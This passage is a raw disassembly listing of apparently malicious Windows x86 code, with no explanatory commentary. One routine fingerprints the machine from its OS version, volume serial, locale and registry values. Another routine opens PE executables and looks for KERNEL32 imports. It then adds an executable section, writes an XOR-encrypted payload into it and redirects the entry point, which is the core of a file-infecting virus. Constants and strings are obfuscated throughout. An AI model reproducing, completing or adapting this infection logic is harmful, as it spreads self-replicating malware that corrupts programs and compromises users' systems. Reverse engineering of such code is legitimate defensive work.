push eax
call sub_44506D
mov eax, dword_44D184
add eax, 3Fh
lea esi, [esi+eax]
inc ebx
loc_43F139: ; CODE XREF: sub_43F09C+85�j
mov edi, [ebp+arg_4]
mov edx, dword_44D214
add edx, 3Fh
mov eax, edi
add eax, edx
jge short loc_43F14E
add eax, 3Fh
loc_43F14E: ; CODE XREF: sub_43F09C+AD�j
sar eax, 6
cmp ebx, eax
jl short loc_43F123
push [ebp+var_14]
call sub_43E024
lea eax, [ebp+var_54]
push eax
push [ebp+arg_8]
call sub_43F082
movsx eax, word_44D228
add eax, 0Ch
push eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_54]
push eax
call ds:dword_44C828
add esp, 18h
mov edi, dword_44D134
sub edi, 4
cmp eax, edi
jz short loc_43F197
xor eax, eax
inc eax
jmp short loc_43F199
; ---------------------------------------------------------------------------
loc_43F197: ; CODE XREF: sub_43F09C+F4�j
xor eax, eax
loc_43F199: ; CODE XREF: sub_43F09C+F9�j
pop edi
pop esi
pop ebx
leave
retn
sub_43F09C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43F19E proc near ; CODE XREF: sub_4425A6+165�p
var_FFF = byte ptr -0FFFh
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1000h
call sub_445950
push ebx
push esi
push edi
movsx eax, word_44D21C
add eax, dword_44D0D0
sub eax, 7
push eax
lea eax, [ebp+var_FFF]
push eax
call sub_440CB4
add esp, 8
mov edi, dword_44D170
sub edi, 5
jmp short loc_43F1F3
; ---------------------------------------------------------------------------
loc_43F1D9: ; CODE XREF: sub_43F19E+5B�j
cmp [ebp+edi+var_FFF], 23h
jnz short loc_43F1F2
mov eax, dword_44D158
sub eax, 8
mov [ebp+edi+var_FFF], al
loc_43F1F2: ; CODE XREF: sub_43F19E+43�j
inc edi
loc_43F1F3: ; CODE XREF: sub_43F19E+39�j
cmp edi, 0FFFh
jb short loc_43F1D9
lea esi, [ebp+var_FFF]
loc_43F201: ; CODE XREF: sub_43F19E+EB�j
push offset byte_44E355
call sub_43AC82
push offset dword_447FD0
mov ebx, dword_44D198
add ebx, dword_44D238
sub ebx, 12h
push ebx
mov ebx, dword_44D0D0
dec ebx
push ebx
push eax
push dword_44D15C
push 0
push esi
push [ebp+arg_0]
mov ebx, dword_44D1C4
inc ebx
add ebx, dword_44D10C
and ebx, 0FFh
push ebx
call sub_43BC02
add esp, 28h
mov ecx, esi
or eax, 0FFFFFFFFh
loc_43F256: ; CODE XREF: sub_43F19E+BD�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43F256
movsx edx, word_44D144
add edx, dword_44D22C
sub edx, 0Ch
mov ebx, eax
add ebx, esi
mov esi, edx
add esi, ebx
movsx eax, byte ptr [esi]
mov edx, dword_44D238
add edx, dword_44D100
sub edx, 10h
cmp eax, edx
jnz loc_43F201
pop edi
pop esi
pop ebx
leave
retn
sub_43F19E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43F294 proc near ; CODE XREF: sub_43E524+E1�p
var_1AC = dword ptr -1ACh
var_1A8 = dword ptr -1A8h
var_1A4 = byte ptr -1A4h
var_1A0 = byte ptr -1A0h
var_19C = dword ptr -19Ch
var_198 = dword ptr -198h
var_193 = dword ptr -193h
var_18F = dword ptr -18Fh
var_18B = dword ptr -18Bh
var_187 = dword ptr -187h
var_183 = dword ptr -183h
var_FF = byte ptr -0FFh
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1ACh
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
mov byte ptr [edi], 0
mov [ebp+var_193], 94h
lea eax, [ebp+var_193]
push eax
call ds:dword_44CD78 ; GetVersionExA
cmp [ebp+var_183], 1
jnz short loc_43F2DB
push offset byte_44E34F
call sub_43AC82
push eax
push edi
call ds:dword_446024
add esp, 0Ch
loc_43F2DB: ; CODE XREF: sub_43F294+30�j
cmp [ebp+var_183], 2
jnz short loc_43F2F9
push offset byte_44E349
call sub_43AC82
push eax
push edi
call ds:dword_44C810
add esp, 0Ch
loc_43F2F9: ; CODE XREF: sub_43F294+4E�j
push offset byte_44E33D
call sub_43AC82
push [ebp+var_187]
push [ebp+var_18B]
push [ebp+var_18F]
push eax
lea ebx, [ebp+var_FF]
push ebx
call ds:dword_44C810
lea eax, [ebp+var_FF]
push eax
push edi
call ds:dword_446024
push offset word_44E336
call sub_43AC82
movsx ebx, word_44D21C
movsx edx, word_44D11C
add ebx, edx
sub ebx, 0Ah
push ebx
push 0
lea ebx, [ebp+var_1A0]
push ebx
lea ebx, [ebp+var_1A0]
push ebx
lea ebx, [ebp+var_19C]
push ebx
push 0FFh
lea ebx, [ebp+var_FF]
push ebx
push eax
call ds:dword_44C7E4 ; GetVolumeInformationA
push offset word_44E32E
call sub_43AC82
push [ebp+var_19C]
push eax
lea ebx, [ebp+var_FF]
push ebx
call ds:dword_44C810
lea eax, [ebp+var_FF]
push eax
push edi
call ds:dword_446024
push 0FFh
lea eax, [ebp+var_FF]
push eax
movsx eax, word_44D148
add eax, dword_44D1D4
sub eax, 2
push eax
push 400h
call ds:dword_4495A8 ; GetLocaleInfoA
lea eax, [ebp+var_FF]
push eax
push edi
call ds:dword_446024
push offset byte_44E329
call sub_43AC82
push eax
push edi
call ds:dword_446024
mov [ebp+var_198], 0FFh
push offset dword_44E2FC
call sub_43AC82
mov [ebp+var_1A8], eax
push offset byte_44E2EF
call sub_43AC82
lea ebx, [ebp+var_1A4]
push ebx
lea ebx, [ebp+var_198]
push ebx
lea ebx, [ebp+var_FF]
push ebx
push eax
mov ebx, [ebp+var_1A8]
push ebx
push 80000002h
call sub_444702
add esp, 70h
mov esi, eax
mov eax, dword_44D1D8
sub eax, 2
cmp esi, eax
jnz short loc_43F45C
lea eax, [ebp+var_FF]
push eax
push edi
call ds:dword_446024
add esp, 8
jmp short loc_43F4C7
; ---------------------------------------------------------------------------
loc_43F45C: ; CODE XREF: sub_43F294+1B3�j
mov [ebp+var_198], 0FFh
push offset asc_44E2BF ; ","
call sub_43AC82
mov [ebp+var_1AC], eax
push offset asc_44E2B2 ; "\t"
call sub_43AC82
lea ebx, [ebp+var_1A4]
push ebx
lea ebx, [ebp+var_198]
push ebx
lea ebx, [ebp+var_FF]
push ebx
push eax
mov ebx, [ebp+var_1AC]
push ebx
push 80000002h
call sub_444702
add esp, 20h
mov esi, eax
mov eax, dword_44D240
inc eax
cmp esi, eax
jnz short loc_43F4C7
lea eax, [ebp+var_FF]
push eax
push edi
call ds:dword_446024
add esp, 8
loc_43F4C7: ; CODE XREF: sub_43F294+1C6�j
; sub_43F294+220�j
pop edi
pop esi
pop ebx
leave
retn
sub_43F294 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43F4CC proc near ; CODE XREF: sub_4433F9+1BF�p
var_32016 = byte ptr -32016h
var_32014 = dword ptr -32014h
var_32010 = dword ptr -32010h
var_3200B = byte ptr -3200Bh
var_31F5C = dword ptr -31F5Ch
var_31F58 = dword ptr -31F58h
var_31F54 = dword ptr -31F54h
var_31F50 = dword ptr -31F50h
var_31F4C = dword ptr -31F4Ch
var_31F48 = dword ptr -31F48h
var_31F44 = dword ptr -31F44h
var_31F40 = dword ptr -31F40h
var_31F3C = dword ptr -31F3Ch
var_31F38 = dword ptr -31F38h
var_31F34 = dword ptr -31F34h
var_31F30 = dword ptr -31F30h
var_31F2C = dword ptr -31F2Ch
var_31F28 = dword ptr -31F28h
var_31F24 = dword ptr -31F24h
var_31F20 = dword ptr -31F20h
var_31F1C = dword ptr -31F1Ch
var_31F18 = dword ptr -31F18h
var_31F14 = dword ptr -31F14h
var_31F10 = dword ptr -31F10h
var_31F0C = dword ptr -31F0Ch
var_31F08 = dword ptr -31F08h
var_31F04 = dword ptr -31F04h
var_31F00 = dword ptr -31F00h
var_31EFC = dword ptr -31EFCh
var_31EF8 = dword ptr -31EF8h
var_31EF4 = dword ptr -31EF4h
var_31EF0 = dword ptr -31EF0h
var_31EEC = dword ptr -31EECh
var_31EE8 = dword ptr -31EE8h
var_31EE4 = dword ptr -31EE4h
var_31EE0 = dword ptr -31EE0h
var_31EDC = dword ptr -31EDCh
var_31ED8 = dword ptr -31ED8h
var_31ED4 = byte ptr -31ED4h
var_31EC7 = byte ptr -31EC7h
var_1194 = dword ptr -1194h
var_1190 = dword ptr -1190h
var_118C = dword ptr -118Ch
var_1188 = dword ptr -1188h
var_1184 = dword ptr -1184h
var_1180 = dword ptr -1180h
var_117C = dword ptr -117Ch
var_1178 = dword ptr -1178h
var_1174 = dword ptr -1174h
var_116F = byte ptr -116Fh
var_1070 = dword ptr -1070h
var_106C = dword ptr -106Ch
var_1068 = dword ptr -1068h
var_1064 = dword ptr -1064h
var_1060 = dword ptr -1060h
var_105C = dword ptr -105Ch
var_1058 = dword ptr -1058h
var_1054 = dword ptr -1054h
var_1050 = dword ptr -1050h
var_C54 = dword ptr -0C54h
var_C50 = dword ptr -0C50h
var_C4C = dword ptr -0C4Ch
var_850 = dword ptr -850h
var_84C = dword ptr -84Ch
var_848 = dword ptr -848h
var_844 = dword ptr -844h
var_840 = dword ptr -840h
var_83C = dword ptr -83Ch
var_440 = dword ptr -440h
var_43C = dword ptr -43Ch
var_438 = dword ptr -438h
var_434 = dword ptr -434h
var_430 = dword ptr -430h
var_42C = dword ptr -42Ch
var_428 = dword ptr -428h
var_424 = dword ptr -424h
var_420 = dword ptr -420h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, 32014h
call sub_445950
push ebx
push esi
push edi
push [ebp+arg_8]
push [ebp+arg_4]
lea eax, [ebp+var_31EC7]
push eax
call ds:dword_44B808
add esp, 0Ch
movsx eax, word_44D23C
add eax, dword_44D188
sub eax, 0Eh
mov [ebp+var_31EE0], eax
loc_43F508: ; CODE XREF: sub_43F4CC+9B�j
push 0
movsx eax, word_44D130
sub eax, 2
push eax
push 3
push 0
movsx eax, word_44D0B8
sub eax, 9
push eax
push 0C0000001h
push [ebp+arg_0]
call ds:dword_44C968 ; CreateFileA
mov [ebp+var_1070], eax
cmp eax, 0FFFFFFFFh
jnz short loc_43F570
inc [ebp+var_31EE0]
movsx eax, word_44D180
movsx edx, word_44D0A0
add eax, edx
sub eax, 5
cmp [ebp+var_31EE0], eax
jnz short loc_43F569
push [ebp+arg_0]
call sub_43B347
pop ecx
jmp short loc_43F508
; ---------------------------------------------------------------------------
loc_43F569: ; CODE XREF: sub_43F4CC+90�j
xor eax, eax
jmp loc_4409DA
; ---------------------------------------------------------------------------
loc_43F570: ; CODE XREF: sub_43F4CC+6F�j
push 0
push [ebp+var_1070]
call ds:dword_44C7F8 ; GetFileSize
mov [ebp+var_10], eax
mov edx, [ebp+arg_8]
lea eax, [eax+edx+1FFFFh]
push eax
push 0
call ds:dword_4499EC ; LocalAlloc
mov [ebp+var_4], eax
push 0
lea eax, [ebp+var_31EDC]
push eax
push [ebp+var_10]
push [ebp+var_4]
push [ebp+var_1070]
call ds:dword_44602C ; ReadFile
mov eax, [ebp+var_4]
mov eax, [eax+3Ch]
mov [ebp+var_840], eax
mov eax, [ebp+var_31EDC]
sub eax, 0F8h
cmp [ebp+var_840], eax
ja loc_4409C3
mov eax, [ebp+var_840]
add eax, [ebp+var_4]
mov [ebp+var_8], eax
movzx eax, word ptr [eax]
cmp eax, 4550h
jnz loc_4409C3
mov eax, [ebp+var_8]
movzx eax, word ptr [eax+5Ch]
cmp eax, dword_44D1E0
jz loc_4409C3
and [ebp+var_1180], 0
mov eax, [ebp+var_8]
movzx edx, word ptr [eax+44h]
mov ecx, dword_44D134
add ecx, 9
cmp edx, ecx
jnz short loc_43F655
mov edx, dword_44D0D8
add edx, 3
mov [eax+1Ah], dl
cmp dl, 0
jz short loc_43F655
movzx eax, word ptr [eax+46h]
mov [ebp+var_31EF0], eax
movsx eax, word_44D128
cmp [ebp+var_31EF0], eax
jnb loc_4409C3
mov [ebp+var_1180], 1
loc_43F655: ; CODE XREF: sub_43F4CC+14F�j
; sub_43F4CC+160�j
cmp [ebp+var_1180], 0
jz short loc_43F67C
mov eax, [ebp+var_8]
add eax, 6
movzx edx, word ptr [eax]
movsx ecx, word_44D11C
add ecx, dword_44D1D8
sub ecx, 3
sub edx, ecx
mov [eax], dx
loc_43F67C: ; CODE XREF: sub_43F4CC+190�j
mov eax, [ebp+var_8]
mov eax, [eax+80h]
mov [ebp+var_430], eax
mov eax, 28h
mov [ebp+var_31EF0], eax
mov edx, [ebp+var_8]
mov [ebp+var_31EF8], edx
mov ecx, [ebp+var_840]
add ecx, 0F8h
mov [ebp+var_31EF4], eax
movzx edi, word ptr [edx+6]
mul edi
mov [ebp+var_31EFC], eax
mov edx, ecx
add edx, eax
mov [ebp+var_31F04], edx
mov eax, [ebp+var_31EF0]
mov [ebp+var_31F00], eax
movsx ecx, word_44D11C
mul ecx
mov [ebp+var_31F08], eax
mov eax, [ebp+var_31F04]
mov edx, [ebp+var_31F08]
add eax, edx
mov edx, [ebp+var_31EF8]
add eax, [edx+0D4h]
cmp eax, [edx+54h]
ja loc_4409C3
movsx eax, word_44D0B4
add eax, dword_44D0E0
sub eax, 6
mov [ebp+var_20], eax
mov eax, dword_44D0FC
add eax, dword_44D248
sub eax, 7
mov [ebp+var_C54], eax
mov eax, dword_44D1F4
add eax, dword_44D24C
sub eax, 0Ch
mov [ebp+var_105C], eax
mov eax, dword_44D1C8
add eax, dword_44D100
sub eax, 9
mov [ebp+var_434], eax
jmp loc_43F81B
; ---------------------------------------------------------------------------
loc_43F759: ; CODE XREF: sub_43F4CC+35C�j
mov eax, 28h
mul [ebp+var_434]
mov [ebp+var_31F14], eax
mov eax, [ebp+var_840]
mov edx, [ebp+var_4]
lea eax, [eax+edx+0F8h]
mov edx, [ebp+var_31F14]
mov esi, edx
add esi, eax
mov eax, [esi+0Ch]
add eax, [esi+8]
mov [ebp+var_31F0C], eax
mov eax, [esi+14h]
add eax, [esi+10h]
mov [ebp+var_31F10], eax
mov eax, [ebp+var_20]
cmp [ebp+var_31F0C], eax
jbe short loc_43F7B0
mov eax, [ebp+var_31F0C]
mov [ebp+var_20], eax
loc_43F7B0: ; CODE XREF: sub_43F4CC+2D9�j
mov eax, [ebp+var_C54]
cmp [ebp+var_31F10], eax
jbe short loc_43F7CA
mov eax, [ebp+var_31F10]
mov [ebp+var_C54], eax
loc_43F7CA: ; CODE XREF: sub_43F4CC+2F0�j
mov eax, [ebp+var_8]
mov eax, [eax+0A8h]
cmp eax, [esi+0Ch]
jb short loc_43F7F5
cmp eax, [ebp+var_31F0C]
jnb short loc_43F7F5
mov eax, [esi+14h]
mov edx, [ebp+var_8]
add eax, [edx+0A8h]
sub eax, [esi+0Ch]
mov [ebp+var_105C], eax
loc_43F7F5: ; CODE XREF: sub_43F4CC+30A�j
; sub_43F4CC+312�j
mov eax, [ebp+var_430]
mov edx, [esi+0Ch]
cmp eax, edx
jb short loc_43F815
add edx, [esi+8]
cmp eax, edx
jnb short loc_43F815
sub eax, [esi+0Ch]
add eax, [esi+14h]
mov [ebp+var_844], eax
loc_43F815: ; CODE XREF: sub_43F4CC+334�j
; sub_43F4CC+33B�j
inc [ebp+var_434]
loc_43F81B: ; CODE XREF: sub_43F4CC+288�j
mov eax, [ebp+var_8]
movzx eax, word ptr [eax+6]
cmp [ebp+var_434], eax
jb loc_43F759
mov eax, dword_44D118
add eax, 0FF4h
movsx edx, word_44D160
add eax, edx
push eax
push [ebp+var_20]
call sub_44108C
add esp, 8
mov [ebp+var_20], eax
cmp [ebp+var_1180], 0
jz short loc_43F862
mov eax, [ebp+var_C54]
mov [ebp+var_10], eax
loc_43F862: ; CODE XREF: sub_43F4CC+38B�j
mov eax, [ebp+var_C54]
cmp [ebp+var_10], eax
jz short loc_43F88C
mov eax, [ebp+var_8]
movsx edx, word_44D1F0
add edx, dword_44D124
sub edx, 4
cmp [eax+0A8h], edx
jz loc_4409C3
loc_43F88C: ; CODE XREF: sub_43F4CC+39F�j
mov eax, dword_44D094
movsx edx, word_44D0B4
add eax, edx
sub eax, 6
cmp [ebp+var_105C], eax
jz loc_43F974
mov eax, dword_44D178
sub eax, 5
mov [ebp+var_31F14], eax
mov eax, dword_44D1FC
add eax, dword_44D20C
sub eax, 0Bh
mov [ebp+var_31F0C], eax
jmp short loc_43F91B
; ---------------------------------------------------------------------------
loc_43F8CD: ; CODE XREF: sub_43F4CC+475�j
mov eax, [ebp+var_105C]
mov [ebp+var_31F18], eax
mov eax, 1Ch
mul [ebp+var_31F0C]
mov [ebp+var_31F1C], eax
mov eax, [ebp+var_31F18]
mov edx, [ebp+var_31F1C]
add eax, edx
add eax, [ebp+var_4]
mov [ebp+var_31F10], eax
mov edx, [ebp+var_31F14]
cmp [eax+18h], edx
jbe short loc_43F915
mov eax, [eax+18h]
mov [ebp+var_31F14], eax
loc_43F915: ; CODE XREF: sub_43F4CC+43E�j
inc [ebp+var_31F0C]
loc_43F91B: ; CODE XREF: sub_43F4CC+3FF�j
mov edi, [ebp+var_8]
mov eax, [edi+0ACh]
mov ecx, 1Ch
shr eax, 2
mov edx, 24924925h
mul edx
mov [ebp+var_31F18], edx
mov edi, edx
cmp [ebp+var_31F0C], edi
jb short loc_43F8CD
mov eax, [ebp+var_8]
push dword ptr [eax+3Ch]
push [ebp+var_31F14]
call sub_44108C
add esp, 8
mov [ebp+var_31F14], eax
mov eax, [ebp+var_C54]
cmp eax, [ebp+var_10]
jz short loc_43F974
cmp [ebp+var_31F14], eax
jnz loc_4409C3
loc_43F974: ; CODE XREF: sub_43F4CC+3D7�j
; sub_43F4CC+49A�j
and [ebp+var_1174], 0
mov eax, dword_44D0F0
mov [ebp+var_438], eax
jmp loc_43FAC3
; ---------------------------------------------------------------------------
loc_43F98B: ; CODE XREF: sub_43F4CC+606�j
mov eax, [ebp+var_844]
add eax, [ebp+var_438]
add eax, [ebp+var_4]
mov [ebp+var_32010], eax
mov edx, dword_44D214
movsx ecx, word_44D210
add edx, ecx
sub edx, 7
cmp [eax], edx
jz loc_43FAD8
mov eax, [ebp+var_32010]
mov eax, [eax+0Ch]
sub eax, [ebp+var_430]
add eax, [ebp+var_844]
mov [ebp+var_32014], eax
add eax, [ebp+var_4]
push eax
lea eax, [ebp+var_3200B]
push eax
call ds:dword_4491A4
add esp, 8
mov eax, dword_44D208
movsx edx, word_44D120
add eax, edx
sub eax, 0Fh
mov [ebp+var_31F0C], eax
jmp short loc_43FA2D
; ---------------------------------------------------------------------------
loc_43FA02: ; CODE XREF: sub_43F4CC+57A�j
mov eax, [ebp+var_31F0C]
mov al, [ebp+eax+var_3200B]
cmp al, 61h
jle short loc_43FA27
cmp al, 7Ah
jge short loc_43FA27
mov eax, [ebp+var_31F0C]
lea eax, [ebp+eax+var_3200B]
sub byte ptr [eax], 20h
loc_43FA27: ; CODE XREF: sub_43F4CC+545�j
; sub_43F4CC+549�j
inc [ebp+var_31F0C]
loc_43FA2D: ; CODE XREF: sub_43F4CC+534�j
mov eax, [ebp+var_31F0C]
movsx eax, [ebp+eax+var_3200B]
mov edx, dword_44D100
sub edx, 7
cmp eax, edx
jnz short loc_43FA02
mov eax, dword_44D0E0
cmp byte ptr [ebp+eax+var_32010+3], 4Bh
jnz short loc_43FABC
mov eax, dword_44D1A4
add eax, dword_44D1D8
cmp byte ptr [ebp+eax+var_32010+2], 45h
jnz short loc_43FABC
mov eax, dword_44D108
mov edx, dword_44D09C
add edx, eax
cmp byte ptr [ebp+edx+var_32014+1], 52h
jnz short loc_43FABC
mov edx, dword_44D1D0
cmp [ebp+edx+var_3200B], 4Ch
jnz short loc_43FABC
cmp byte ptr [ebp+eax+var_32010+2], 33h
jnz short loc_43FABC
mov eax, dword_44D0B0
add eax, dword_44D238
cmp [ebp+eax+var_32016], 32h
jnz short loc_43FABC
mov [ebp+var_1174], 1
loc_43FABC: ; CODE XREF: sub_43F4CC+589�j
; sub_43F4CC+59E�j ...
add [ebp+var_438], 14h
loc_43FAC3: ; CODE XREF: sub_43F4CC+4BA�j
mov eax, [ebp+var_8]
mov eax, [eax+84h]
cmp [ebp+var_438], eax
jb loc_43F98B
loc_43FAD8: ; CODE XREF: sub_43F4CC+4E8�j
cmp [ebp+var_1174], 0
jz loc_4409C3
mov eax, [ebp+var_8]
add eax, 16h
or word ptr [eax], 1
lea eax, [ebp+var_31EC7]
mov [ebp+var_42C], eax
mov eax, [eax+3Ch]
mov [ebp+var_84C], eax
add eax, [ebp+var_42C]
mov [ebp+var_848], eax
cmp [ebp+var_1180], 0
jnz loc_43FCBF
mov eax, [ebp+var_8]
mov [ebp+var_31F0C], eax
movsx edx, word_44D190
sub edx, 5
cmp [eax+0D0h], edx
jz loc_43FCBF
mov edx, [eax+0D4h]
mov [ebp+var_31F10], edx
mov ecx, dword_44D208
sub ecx, 6
cmp edx, ecx
jz loc_43FCBF
mov ecx, 28h
mov edi, [ebp+var_840]
add edi, 0F8h
mov eax, ecx
mov edx, [ebp+var_31F0C]
movzx edx, word ptr [edx+6]
mov [ebp+var_31F14], edx
mul edx
mov [ebp+var_31F18], eax
mov edx, edi
add edx, eax
mov [ebp+var_31F20], edx
mov eax, ecx
mov [ebp+var_31F1C], eax
mov ecx, dword_44D1B4
movsx edi, word_44D210
add ecx, edi
sub ecx, 6
mul ecx
mov [ebp+var_31F24], eax
mov eax, [ebp+var_31F20]
mov edx, [ebp+var_31F24]
add eax, edx
mov edx, [ebp+var_31F10]
add eax, edx
mov edx, [ebp+var_31F0C]
cmp [edx+54h], eax
jbe loc_43FCBF
mov eax, [ebp+var_840]
add eax, 0F8h
mov [ebp+var_31F30], eax
mov eax, 28h
mov ecx, [ebp+var_8]
movzx ecx, word ptr [ecx+6]
mul ecx
mov [ebp+var_31F34], eax
mov eax, [ebp+var_31F30]
mov edx, [ebp+var_31F34]
add eax, edx
mov [ebp+var_31F28], eax
mov [ebp+var_31F38], eax
mov eax, 28h
mov ecx, [ebp+var_848]
movzx ecx, word ptr [ecx+6]
movsx edi, word_44D220
add edi, dword_44D0C8
sub edi, 7
sub ecx, edi
mul ecx
mov [ebp+var_31F3C], eax
mov eax, [ebp+var_31F38]
mov edx, [ebp+var_31F3C]
add eax, edx
mov [ebp+var_31F2C], eax
mov eax, [ebp+var_8]
push dword ptr [eax+0D4h]
mov eax, [ebp+var_4]
mov edx, [ebp+var_31F28]
add edx, eax
push edx
mov edx, [ebp+var_31F2C]
add edx, eax
push edx
call ds:dword_44B808
add esp, 0Ch
mov eax, [ebp+var_8]
add eax, 0D0h
mov [ebp+var_31F40], eax
mov eax, 28h
mov ecx, [ebp+var_848]
movzx ecx, word ptr [ecx+6]
movsx edi, word_44D1F0
add edi, dword_44D13C
sub edi, 8
sub ecx, edi
mul ecx
mov [ebp+var_31F44], eax
mov eax, [ebp+var_31F40]
mov edx, eax
mov ecx, [ebp+var_31F44]
add [edx], ecx
loc_43FCBF: ; CODE XREF: sub_43F4CC+64B�j
; sub_43F4CC+66A�j ...
mov eax, [ebp+var_8]
push dword ptr [eax+3Ch]
push [ebp+var_10]
call sub_44108C
mov [ebp+var_10], eax
mov eax, 28h
mov ecx, [ebp+var_8]
movzx ecx, word ptr [ecx+6]
mul ecx
mov [ebp+var_31F28], eax
mov eax, [ebp+var_840]
mov edx, [ebp+var_4]
lea eax, [eax+edx+0F8h]
mov edx, [ebp+var_31F28]
mov esi, edx
add esi, eax
push offset byte_44E2A9
call sub_43AC82
push eax
push esi
call ds:dword_4491A4
mov eax, dword_44D200
add eax, 1FFFAh
mov [esi+8], eax
mov eax, [ebp+var_20]
mov [esi+0Ch], eax
mov eax, [ebp+var_8]
push dword ptr [eax+3Ch]
mov eax, [ebp+arg_8]
add eax, 0Dh
push eax
call sub_44108C
mov [esi+10h], eax
mov eax, [ebp+var_10]
mov [esi+14h], eax
mov eax, dword_44D17C
add eax, 0E0000017h
mov [esi+24h], eax
mov eax, dword_44D198
inc eax
add eax, dword_44D094
push eax
mov eax, dword_44D0BC
movsx edx, word_44D220
add eax, edx
sub eax, 9
push eax
mov eax, esi
add eax, 18h
push eax
call ds:dword_44B818
mov eax, [ebp+var_20]
mov [ebp+var_1060], eax
mov eax, [ebp+var_10]
mov [ebp+var_850], eax
mov eax, [ebp+var_8]
push dword ptr [eax+3Ch]
mov eax, [ebp+var_10]
add eax, [esi+10h]
push eax
call sub_44108C
add esp, 30h
mov [ebp+var_10], eax
movsx eax, word_44D0E8
mov edx, dword_44D1A8
lea eax, [eax+edx+1FFF4h]
add [ebp+var_20], eax
mov eax, [ebp+var_8]
add eax, 6
inc word ptr [eax]
mov eax, [ebp+var_8]
mov edx, [esi+0Ch]
add edx, [esi+8]
mov [eax+50h], edx
call ds:dword_44CD90
movsx edi, word_44D228
sub edi, 3
mov ecx, 0FDh
cdq
idiv ecx
add edi, edx
mov [ebp+var_1064], edi
mov eax, dword_44D124
sub eax, 2
mov edx, [ebp+var_42C]
mov ecx, edi
xor ecx, 4Dh
mov [edx+eax], cl
mov edi, dword_44D134
sub edi, 3
mov ecx, [ebp+arg_8]
shr ecx, 9
mov [edx+edi], cl
call ds:dword_44CD90
mov edi, [ebp+var_84C]
mov edx, [ebp+var_42C]
mov [ebp+var_31F30], edx
mov [ebp+var_31F2C], eax
mov ecx, 0FFh
cdq
idiv ecx
mov ecx, [ebp+var_31F30]
mov [ecx+edi], dl
call ds:dword_44CD90
movsx edx, word_44D0F8
add edx, dword_44D1CC
dec edx
add edi, edx
mov edx, [ebp+var_42C]
mov [ebp+var_31F38], edx
mov [ebp+var_31F34], eax
mov ecx, 0FFh
cdq
idiv ecx
mov ecx, [ebp+var_31F38]
mov [ecx+edi], dl
movsx eax, word_44D21C
mov edx, dword_44D138
lea eax, [eax+edx+35h]
mov [ebp+var_43C], eax
jmp short loc_43FECA
; ---------------------------------------------------------------------------
loc_43FE95: ; CODE XREF: sub_43F4CC+A0A�j
call ds:dword_44CD90
mov edi, [ebp+var_43C]
mov edx, [ebp+var_42C]
mov [ebp+var_31F40], edx
mov [ebp+var_31F3C], eax
mov ecx, 0FFh
cdq
idiv ecx
mov ecx, [ebp+var_31F40]
mov [ecx+edi], dl
inc [ebp+var_43C]
loc_43FECA: ; CODE XREF: sub_43F4CC+9C7�j
mov eax, [ebp+var_84C]
cmp [ebp+var_43C], eax
jb short loc_43FE95
cmp [ebp+var_1180], 0
jz short loc_43FF53
mov eax, [ebp+var_8]
mov edx, [eax+34h]
add edx, [eax+28h]
mov eax, dword_44D0C0
add eax, dword_44D168
sub eax, 6
add edx, eax
mov [ebp+var_31F44], edx
mov eax, [ebp+var_850]
movsx edx, word_44D1DC
add edx, dword_44D15C
dec edx
add eax, edx
mov edx, [ebp+var_4]
mov eax, [edx+eax]
mov [ebp+var_31F48], eax
mov edx, dword_44D22C
add edx, 0FFFFFFFBh
sub eax, edx
add eax, [ebp+var_31F44]
mov edx, dword_44D094
add edx, 2
add eax, edx
mov [ebp+var_31F4C], eax
mov eax, [ebp+var_8]
mov edx, [ebp+var_31F4C]
sub edx, [eax+34h]
mov [eax+28h], edx
loc_43FF53: ; CODE XREF: sub_43F4CC+A13�j
push 0Dh
push offset dword_44D28C
lea eax, [ebp+var_31ED4]
push eax
call ds:dword_44B808
mov eax, [esi+10h]
add eax, 0Dh
push eax
lea eax, [ebp+var_31ED4]
push eax
mov eax, [esi+14h]
add eax, [ebp+var_4]
push eax
call ds:dword_44B808
add esp, 18h
mov eax, [esi+14h]
add eax, 0Dh
mov [ebp+var_1068], eax
movsx edx, word_44D228
sub edx, 2
add eax, edx
mov [ebp+var_424], eax
jmp short loc_43FFBF
; ---------------------------------------------------------------------------
loc_43FFA5: ; CODE XREF: sub_43F4CC+B02�j
mov eax, [ebp+var_424]
add eax, [ebp+var_4]
movzx edx, byte ptr [eax]
xor edx, [ebp+var_1064]
mov [eax], dl
inc [ebp+var_424]
loc_43FFBF: ; CODE XREF: sub_43F4CC+AD7�j
mov eax, [ebp+var_1068]
add eax, [ebp+arg_8]
cmp [ebp+var_424], eax
jb short loc_43FFA5
mov eax, dword_44D124
movsx edx, word_44D204
add eax, edx
sub eax, 8
mov [ebp+var_18], eax
mov eax, dword_44D168
add eax, dword_44D240
sub eax, 9
mov [ebp+var_440], eax
jmp loc_440266
; ---------------------------------------------------------------------------
loc_43FFFD: ; CODE XREF: sub_43F4CC+DAA�j
mov eax, 28h
mul [ebp+var_440]
mov [ebp+var_31F48], eax
mov eax, [ebp+var_84C]
mov edx, [ebp+var_42C]
lea eax, [eax+edx+0F8h]
mov edx, [ebp+var_31F48]
mov ebx, edx
add ebx, eax
mov eax, 28h
mov ecx, [ebp+var_8]
movzx ecx, word ptr [ecx+6]
mul ecx
mov [ebp+var_31F4C], eax
mov eax, [ebp+var_840]
mov edx, [ebp+var_4]
lea eax, [eax+edx+0F8h]
mov edx, [ebp+var_31F4C]
mov esi, edx
add esi, eax
movsx eax, word_44D0C4
add eax, dword_44D0B0
sub eax, 12h
cmp byte ptr [ebx+eax], 2Eh
jnz short loc_4400A5
movsx eax, word_44D21C
add eax, dword_44D240
sub eax, 5
cmp byte ptr [ebx+eax], 72h
jnz short loc_4400A5
mov eax, dword_44D0AC
add eax, dword_44D0D0
dec eax
cmp byte ptr [ebx+eax], 63h
jnz short loc_4400A5
mov eax, [ebx+14h]
mov [ebp+var_1178], eax
jmp loc_440260
